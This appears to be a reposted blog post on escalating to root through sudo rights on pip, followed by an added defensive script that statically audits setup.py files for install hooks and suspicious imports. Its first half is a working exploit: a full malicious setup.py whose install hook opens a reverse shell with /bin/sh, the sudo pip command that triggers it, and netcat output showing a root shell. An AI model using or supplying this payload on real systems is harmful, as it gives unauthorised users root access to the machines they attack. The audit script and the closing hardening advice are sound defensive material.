
Python pip privilege escalation

程序员文章站 2022-07-14 15:31:25

On some Linux machines a user has sudo rights for pip. In that situation, pip install can be used for local privilege escalation.
pip install invokes the package's setup.py, so a malicious setup.py created locally achieves arbitrary command execution with the privileges pip runs under.

from setuptools import setup
from setuptools.command.install import install
import os, socket, subprocess

class CustomInstall(install):
  def run(self):
    install.run(self)
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("127.0.0.1",1234))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    p=subprocess.call(["/bin/sh","-i"])

setup(name='FakePip',
      version='0.0.1',
      description='Reverse shell',
      url='xx.xx.xx.xx',
      author='nathan',
      author_email='[email protected]',
      license='MIT',
      zip_safe=False,
      cmdclass={'install': CustomInstall})

Running sudo pip install . --upgrade --force-reinstall yields a reverse shell with root privileges:

[email protected]:~/vul_study/sudo_pip$ sudo pip install . --upgrade
The directory '/home/nathan/.cache/pip/http' or its parent directory is not owned by the current user and the cache has been disabled. Please check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
The directory '/home/nathan/.cache/pip' or its parent directory is not owned by the current user and caching wheels has been disabled. check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
Processing /home/nathan/vul_study/sudo_pip
Installing collected packages: FakePip
  Found existing installation: FakePip 0.0.1
    Uninstalling FakePip-0.0.1:
      Successfully uninstalled FakePip-0.0.1
  Running setup.py install for FakePip ... -
[email protected]:~/share/trans$ nc -lp 1234
# id
uid=0(root) gid=0(root) groups=0(root)
# ls
FakePip.egg-info
pip-delete-this-directory.txt
pip-egg-info
setup.py
# pwd
/tmp/pip-5AYQjK-build
#
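The risk above comes from pip executing arbitrary setup.py code under sudo. A defender who must install local packages as root can at least statically inspect setup.py first. The following audit script is an added example, not code from the original post; the module list and command-hook list are illustrative assumptions, and both sample setup.py strings are constructed for the demonstration.

```python
import ast

# Modules whose presence in a setup.py deserves a second look before the
# file is executed with elevated privileges (illustrative assumption).
SUSPICIOUS_MODULES = {"socket", "subprocess", "os", "pty"}
# setuptools commands that run automatically during `pip install`.
INSTALL_HOOKS = {"install", "develop", "egg_info", "build_py"}

def audit_setup_py(source: str) -> list:
    """Statically inspect setup.py source and return human-readable findings."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                root = alias.name.split(".")[0]
                if root in SUSPICIOUS_MODULES:
                    findings.append(f"imports {root}")
        elif isinstance(node, ast.ImportFrom) and node.module:
            if node.module.split(".")[0] in SUSPICIOUS_MODULES:
                findings.append(f"imports {node.module}")
        elif isinstance(node, ast.ClassDef):
            # A class deriving from a setuptools command hooks the install step.
            for base in node.bases:
                if isinstance(base, ast.Name) and base.id in INSTALL_HOOKS:
                    findings.append(f"subclasses {base.id} command")
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Name) \
                and node.func.id == "setup":
            # setup(cmdclass={...}) wires custom code into pip's install phase.
            for kw in node.keywords:
                if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                    for key in kw.value.keys:
                        if isinstance(key, ast.Constant) and key.value in INSTALL_HOOKS:
                            findings.append(f"overrides {key.value} command")
    return findings

# Constructed sample: the shape of the setup.py discussed above, with the
# custom command body reduced to a stub.
SUSPICIOUS = '''
from setuptools import setup
from setuptools.command.install import install
import os, socket, subprocess

class CustomInstall(install):
    def run(self):
        install.run(self)

setup(name="FakePip", version="0.0.1", cmdclass={"install": CustomInstall})
'''

# Constructed sample: an ordinary package with no command hooks.
BENIGN = 'from setuptools import setup\nsetup(name="demo", version="1.0")\n'

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, audit_setup_py(src) or ["no findings"])
```

A clean result does not prove a package is safe (obfuscated or dynamically loaded code evades this check); the durable fix is to not grant sudo rights to pip at all.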